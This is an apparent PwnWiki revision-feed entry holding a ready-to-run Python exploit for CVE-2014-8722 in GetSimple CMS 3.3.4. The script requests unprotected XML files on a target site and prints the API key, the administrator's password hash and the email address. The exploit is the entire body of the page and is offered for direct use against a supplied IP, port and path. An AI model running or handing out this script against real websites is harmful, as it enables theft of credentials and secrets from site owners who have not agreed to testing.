https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2014-8722_GetSimple_CMS_3.3.4_%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E
CVE-2014-8722 GetSimple CMS 3.3.4 信息泄露漏洞 - Revision history
2026-04-24T13:24:33Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2014-8722_GetSimple_CMS_3.3.4_%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E&diff=3892&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure # Date 01.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: http://get-simple.in..."
2021-06-03T00:54:39Z
<p>Created page with "==EXP== <pre> # Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure # Date 01.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: http://get-simple.in..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure<br />
# Date 01.06.2021<br />
# Exploit Author: Ron Jost (Hacker5preme)<br />
# Vendor Homepage: http://get-simple.info/<br />
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip<br />
# Version: 3.3.4<br />
# CVE: CVE-2014-8722<br />
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit<br />
<br />
<br />
'''<br />
Description:<br />
GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to<br />
(1) data/users/<username>.xml,<br />
(2) backups/users/<username>.xml.bak,<br />
(3) data/other/authorization.xml, or<br />
(4) data/other/appid.xml.<br />
'''<br />
<br />
<br />
'''<br />
Import required modules:<br />
'''<br />
import sys<br />
import requests<br />
<br />
'''<br />
User-Input:<br />
'''<br />
target_ip = sys.argv[1]<br />
target_port = sys.argv[2]<br />
cmspath = sys.argv[3]<br />
print('')<br />
username = input("Do you know the username? Y/N: ")<br />
if username == 'Y':<br />
print('')<br />
username = True<br />
username_string = input('Please enter the username: ')<br />
else:<br />
print('')<br />
username = False<br />
print('No problem, you will still get the API key')<br />
<br />
<br />
'''<br />
Get Api-Key:<br />
'''<br />
url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml'<br />
header = {<br />
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",<br />
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",<br />
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",<br />
"Accept-Encoding": "gzip, deflate",<br />
"Connection": "close",<br />
"Upgrade-Insecure-Requests": "1",<br />
"Cache-Control": "max-age=0"<br />
}<br />
x = requests.get(url, headers=header).text<br />
start = x.find('[') + 7<br />
end = x.find(']')<br />
api_key = x[start:end]<br />
print('')<br />
print('Informations:')<br />
print('')<br />
print('[*] API Key: ' + api_key)<br />
<br />
<br />
if username:<br />
'''<br />
Get Email and Passwordhash:<br />
'''<br />
url = "http://" + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml'<br />
header = {<br />
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0",<br />
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",<br />
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",<br />
"Accept-Encoding": "gzip, deflate",<br />
"Connection": "close",<br />
"Upgrade-Insecure-Requests": "1",<br />
"Cache-Control": "max-age=0"<br />
}<br />
x = requests.get(url, headers=header).text<br />
start = x[x.find('PWD>'):]<br />
passwordhash = start[start.find('>') +1 :start.find('<')]<br />
print('[*] Hashed Password: ' + passwordhash)<br />
<br />
start = x[x.find('EMAIL>'):]<br />
email = start[start.find('>') + 1 : start.find('<')]<br />
print('[*] Email: ' + email)<br />
print('')<br />
</pre></div>
Pwnwiki